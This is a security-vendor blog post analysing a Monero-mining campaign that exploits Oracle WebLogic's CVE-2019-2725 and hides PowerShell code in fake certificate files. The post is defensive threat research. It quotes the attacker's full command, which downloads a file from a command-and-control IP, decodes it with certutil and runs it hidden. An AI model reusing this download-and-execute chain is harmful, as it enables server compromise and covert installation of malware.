by Mark Vicente, Johnlery Triunfante, and Byron Gelera
In April 2019, a security advisory was released for CVE-2019-2725, a deserialization vulnerability involving the widely used Oracle WebLogic Server. Soon after the advisory was published, reports emerged on the SANS ISC InfoSec forums that the vulnerability was already being actively exploited to install cryptocurrency miners. We managed to confirm these reports after feedback from the Trend Micro™ Smart Protection Network™ security architecture revealed a similar cryptocurrency-mining activity involving the vulnerability, but with an interesting twist — the malware hides its malicious codes in certificate files as an obfuscation tactic.
Figure 1. The infection chain
After arriving on the target machine, the malware will exploit CVE-2019-2725 to execute the following command:
“powershell.exe -Win hiddeN -Exec ByPasS add-content -path %APPDATA%cert.cer (New-Object Net.WebClient).DownloadString(‘hxxp://126.96.36.199:1012/cert.cer’); certutil -decode %APPDATA%cert.cer %APPDATA%update.ps1 & start /b cmd /c powershell.exe -Exec Bypass -NoExit -File %APPDATA%update.ps1 & start /b cmd /c del %APPDATA%cert.cer”
The purpose of the command is to perform a series of routines. First, PowerShell (PS) is used to download a certificate file from the command-and-control (C&C) server and save it under %APPDATA% using the file name cert.cer (detected by Trend Micro as Coinminer.Win32.MALXMR.TIAOODCJ.component).
It then employs the component CertUtil, which is used to manage certificates in Windows, to decode the file. The decoded file is then saved as %APPDATA%\update.ps1.
The newly created update.ps1 (Trojan.PS1.MALXMR.MPA) file is then executed using PS before the downloaded cert.cer file is deleted using cmd.
When we downloaded the certificate file, we noticed that it looked like a normal Privacy-Enhanced Mail (PEM) format certificate.
Figure 2. The downloaded certificate file
However, upon decoding the base64 content, we found that, instead of the commonly used X.509 TLS file format, it actually comes in the form of the following PS command:
One interesting characteristic of the downloaded certificate file is that it requires that it be decoded twice before the PS command is revealed, which is unusual since the command from the exploit only uses CertUtil once. There is also the possibility that the certificate file we downloaded is different from the file that was actually intended to be downloaded by the remote command, perhaps because it is continuously being updated by the threat actors.
The cryptocurrency miner payload
The PS command from the certificate file downloads and executes another PS script in memory. This script will then download and execute the following files:
|Sysupdate.exe||Monero (XMR) miner payload|
|Config.json||The config file for the XMR miner|
|Networkservice.exe||Possibly used for the propagation and exploitation of WebLogic|
|Update.ps1||The PS script in memory|
|Sysguard .exe||Serves as the watchdog for the miner process|
|Clean.bat||Deletes other components|
The update.ps1 file containing the decoded certificate file is then replaced with the new update.ps1. This is followed by the creation of a scheduled task that will execute the new update.ps1 every 30 minutes.
Certificate files as an obfuscation technique
The idea of using certificate files to hide malware is not a new one: a proof of concept was introduced late last year by Sophos in which they demonstrated placing an Excel file with an embedded macro inside a certificate file. If any actual incidents have been found, they are probably few. By using certificate files for obfuscation purposes, a piece of malware can possibly evade detection since the downloaded file is in a certificate file format which is seen as normal -— especially when establishing HTTPS connections.
However, oddly enough, upon execution of the PS command from the decoded certificate file, other malicious files are downloaded without being hidden via the certificate file format mentioned earlier. This might indicate that the obfuscation method is currently being tested for its effectiveness, with its expansion to other malware variants pegged at a later date.
Oracle has already released an update that addresses CVE-2019-2725. Thus, it is highly recommended for organizations that use WebLogic Server to update their software to the latest version to prevent any attacks that exploit the vulnerability from affecting their businesses.
Trend Micro solutions
Trend Micro endpoint solutions such as Trend Micro Smart Protection Suites and Worry-Free™ Business Security can protect users and businesses from these threats by detecting malicious files and blocking all related malicious URLs. Enterprises can also monitor all ports and network protocols for advanced threats and be protected from targeted attacks with the Trend Micro Deep Discovery™ Inspector network appliance.
Deep Discovery Inspector protects customers from these threats via this DDI Rule:
- 2903: Possible Oracle Weblogic Remote Command Execution Exploit – HTTP (Request)
- 2898: Weblogic Unauthenticated RCE Exploit- HTTP (Request)
- 1009707-Oracle Weblogic Server Remote Code Execution Vulnerability (CVE-2019-2725)
- HTTP: Oracle WebLogic Server Remote Code Execution Vulnerability
Indicators of Compromise (IoCs)
|Details||Hashes (SHA-256)||Detection Name|
Updated the DDI rules on June 20, 2019 at 9:53 PM PDT